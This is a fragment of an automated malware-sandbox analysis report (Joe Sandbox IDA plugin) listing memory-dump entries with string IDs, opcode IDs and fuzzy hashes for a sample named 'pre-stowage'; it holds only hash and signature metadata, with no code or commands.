                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;Br^$F$F$F
                                                                                                        • API String ID: 0-1406042771
                                                                                                        • Opcode ID: ae8992d7eb804276ba200a2c1169dcc831bccff34f72cb8444176d9655fc0f64
                                                                                                        • Instruction ID: a7a5e142c01f8555e6eadd1e927692f80860ae5900bcd9e712698c145b9f3fab
                                                                                                        • Opcode Fuzzy Hash: ae8992d7eb804276ba200a2c1169dcc831bccff34f72cb8444176d9655fc0f64
                                                                                                        • Instruction Fuzzy Hash: 7421E0B4E0021CAFD704EFB5C4116AE7BB2EF85304F1094AD9610BB385DB305A45CF81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$F$F$[Br^
                                                                                                        • API String ID: 0-217853069
                                                                                                        • Opcode ID: a3b1fa64f030b18e90257aeb3b53820dbd31049792f5fe8741d8c64976fcedef
                                                                                                        • Instruction ID: f50590bccdccd5c3f582044b8d1bac7a96170ae39d6b66a1cb547c62edb28da3
                                                                                                        • Opcode Fuzzy Hash: a3b1fa64f030b18e90257aeb3b53820dbd31049792f5fe8741d8c64976fcedef
                                                                                                        • Instruction Fuzzy Hash: 2A21BDB4E0421C9BD704EFB9D4016AEBBB2EF85304F1094ADA614BB285DB385A45CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$F$F$KBr^
                                                                                                        • API String ID: 0-1797435459
                                                                                                        • Opcode ID: d4430c7ab61a02be4aa536853878aa25351548b27dcf56341d9b3df9c01ca3dc
                                                                                                        • Instruction ID: cdffe77ce7a2405e094a915801e93ee3782d65d8e834980b6ffb751b43e8ded1
                                                                                                        • Opcode Fuzzy Hash: d4430c7ab61a02be4aa536853878aa25351548b27dcf56341d9b3df9c01ca3dc
                                                                                                        • Instruction Fuzzy Hash: C421EDB4E042089FD705EFB9C4116AEBBB2EF85304F1094A9A614BB385DB305A45CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +Br^$F$F$F
                                                                                                        • API String ID: 0-3182432131
                                                                                                        • Opcode ID: fc24c7121919b97bd7c19e638b9a280058227522a7e39fe4c38ec6a11c155b51
                                                                                                        • Instruction ID: 36cfcaf77b1d91f8ed6fd90697335810ecb4751b11e0257606a0203a19fa8fee
                                                                                                        • Opcode Fuzzy Hash: fc24c7121919b97bd7c19e638b9a280058227522a7e39fe4c38ec6a11c155b51
                                                                                                        • Instruction Fuzzy Hash: F721B0B4E002089FD704EFB9D4016AEBBB2EF85304F1090AD9614BB395DB345906CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.3763527743.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ef0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \;q$\;q$\;q$\;q
                                                                                                        • API String ID: 0-2933265366
                                                                                                        • Opcode ID: 7e48ef68528f02377e1243e849bc50e53bdcad23719b78683142b2f5169e9e17
                                                                                                        • Instruction ID: c78c911fc5d4055ea963426742683b4c592e7b4a551c276a7bf778d56628a311
                                                                                                        • Opcode Fuzzy Hash: 7e48ef68528f02377e1243e849bc50e53bdcad23719b78683142b2f5169e9e17
                                                                                                        • Instruction Fuzzy Hash: 4B01A23170011D8FC7248A2DC540A3577E6FFCC7A8729A16AEA06EB370EAB2EC419750